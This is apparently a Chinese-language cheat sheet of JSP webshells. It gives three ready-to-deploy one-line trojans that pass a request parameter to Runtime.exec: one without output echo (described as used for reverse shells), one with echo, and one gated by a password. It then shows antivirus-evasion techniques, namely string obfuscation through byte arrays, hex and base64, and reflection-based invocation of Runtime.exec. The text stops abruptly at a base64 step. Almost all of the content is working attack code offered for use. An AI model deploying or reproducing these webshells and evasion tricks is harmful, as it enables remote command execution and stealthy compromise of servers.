JSP木馬整理

一、無回顯一句話木馬

http://localhost/index.jsp?cmd=whoami
不會回顯執行的結果只能在後臺打印一個地址，常用來反彈shell

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
  System.out.println(process);
%>
</body>
</html>

二、有回顯一句話木馬

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
  InputStream inputStream = process.getInputStream();
  BufferedReader bufferedReader =  new BufferedReader(new InputStreamReader(inputStream));
  String line;
  while ((line = bufferedReader.readLine())!=null){
     response.getWriter().print(line);
    }
%>
</body>
</html>

 

三、有密碼的回顯一句話木馬

<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>一句話木馬</title>
</head>
<body>
<%
  if ("password".equals(request.getParameter("p"))){
  Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader =  new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine())!=null){
        response.getWriter().print(line);
    }
  }
%>
</body>
</html>

 

四、免殺繞過

（一）JSP中的字符串混淆方式

package com.eleven.test;
import sun.misc.BASE64Decoder;
import javax.xml.bind.DatatypeConverter;
import java.io.IOException;
public class JspEncode {
    public static void main(String[] args) throws IOException {
        String a = new String(new byte[] {121,122,100,100,77,114,54});
        System.out.println("ASCII: "+a);
        String b = new String(DatatypeConverter.parseHexBinary("797a64644d7236"));
        System.out.println("HEX: "+ b);
        String c = new String(new BASE64Decoder().decodeBuffer("eXpkZE1yNg=="));
        System.out.println("BASE64: "+c);
    }
}

（二）類反射繞過

package com.eleven.test;

import java.lang.reflect.Method;
import java.util.Scanner;

public class Test {
    public static void main(String[] args) throws Exception {
        String op = "";
        Class rt = Class.forName("java.lang.Runtime"); //加載Runtime類
        Method gr = rt.getMethod("getRuntime");  //獲取getRuntime方法
        Method ex = rt.getMethod("exec", String.class);  //獲取exec方法
        Process e = (Process) ex.invoke(gr.invoke(null),  "cmd /c whoami"); //invoke 傳參調用
        //以下代碼是獲取輸出結果
        Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
        System.out.print(op);
    }

}

那麼接下來就是把他放到jsp裏面。

利用base64編碼